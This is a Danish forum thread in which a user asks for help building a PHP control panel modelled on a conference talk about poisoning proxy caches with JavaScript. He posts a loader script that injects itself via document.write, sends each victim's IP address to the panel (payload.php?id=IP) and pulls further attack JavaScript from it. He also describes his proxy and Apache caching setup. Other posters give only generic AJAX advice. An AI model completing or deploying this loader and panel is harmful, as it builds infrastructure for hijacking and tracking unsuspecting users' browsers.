Nogle der har styr på PHP?

[MalcolmXI]

HeY

Står og mangler noget hjælp med et PHP Panel.
Det er utrolig basalt, men har ikke datalogi før på næste fredag ;)

I bund og grund skal jeg have hjælp med at forbinde noget javascript til et PHP-script, og lade scriptet gemme de valgte oplysninger til senere brug.
Derfor er det næsten et krav at du kan lidt javascript også.
Har prøvet at få det til at virke de sidste par dage, men desværre har jeg ikke nok viden til at få det til at virke. Det er et halv-nyt koncept, så der er ikke så meget hjælp at hente på nettet.

MlX
;)

[Morph3s]

Javascript er client side og PHP er server side så hvis du vil sende informationer er du ude i enten at sende via POST/GET over ajax til PHP scriptet.
Ellers kan du også gemme information i cookien som bliver sendt til server og herfra læse i php scriptet.

[Doctor Blue]

Lav et PHP script der gemmer oplysninger det modtager over POST. Lav derefter et JavaScript der sender over POST vha. Et XMLHTTP library såsom jQuery.

[MalcolmXI]

Har kigget på Ajax, men ville hellere se om det kan lykkedes på samme måde som originalen. Prøver at følge et koncept præsenteret på BlackHat, Defcon og Sec-T.

Sec-T præsentation: http://www.youtube.com/watch?v=RfEuBAbRLAg
BlackHat Slides: http://media.blackhat.com/bh-us-12/Brief...Slides.pdf
PDF om emnet: http://media.blackhat.com/bh-us-12/Brief...uys_WP.pdf

Som i kan se ser det originale script således ud:

Kode:

function payload() {
    x = document.getElementById("poisonpayload");
    
    if (x == null)
    {
        document.write( "    <script>function getip(json) {
        document.write('<script type=\\\"application/javascript\\\"
        src=\\\"http://localhost/panel/poison payload.php?id=\'+
        json.ip + \'\\\"><scr\'+\'ipt>');
        };</script>
                
                ");
        document.write("<script id='poisonpayload' type='application/javascript'
        src='http://localhost/panel/jsonip.php?callback=getip'></script>");
            }
    }
payload();

I Sec-T præsentationen lige omkring 42:19 ses koden indskrænket i (x == null) betingelsen til kun 2 linier. Dette vil se cirka således ud:

Kode:

document.write("<script>function getip(json)  {document.write('<script type=\\\"application/javascript\\\" src=\\\"http://localhost/panel/payload.php?id=\'+ json.ip + \'\\\"><scr\'+\'ipt>');};</script>");
        document.write("<script id='runpayload' type='application/javascript' src='http://localhost/panel/jsonip.php?callback=getip'></script>");

Edit: Desuden er der tilføjet parent. før document.write.

Kan jeg fjerne alle de underlige tegn, og stadig på scriptet til at kalde den IP funktion?

Har baseret jsonip.php scriptet på følgende eksempel: https://gist.github.com/jonahlyn/1933272

payload.php skulle så indeholde de javascript funktioner der begynder at blive spændende (de er også i de første links)

Har fået proxy(og opsætning) + apache(mod_expires) + tmp folder + permissions og hele skidtet til at virke. Mangler bare at finde ud af hvordan panelet skal virke. Hvis scriptet sender ?callback=IP Adressen til payload.php?id=IP Adressen, skal jeg så bruge if( $_GET["id"] {
Kør de resterende javascripts (I payload.php scriptet).
}

Nok lidt af en ulækker mundfuld, men har brugt et par lede dage på det.

[MalcolmXI]

Noget jeg ikke kan forstå er hvorfor funktionen getip(json) bliver kaldt fra php scriptet, når det kun er i html scriptet. Tror i de har smidt de 2 scripts sammen?
Eller kan det tænkes de har gjort noget helt andet? :/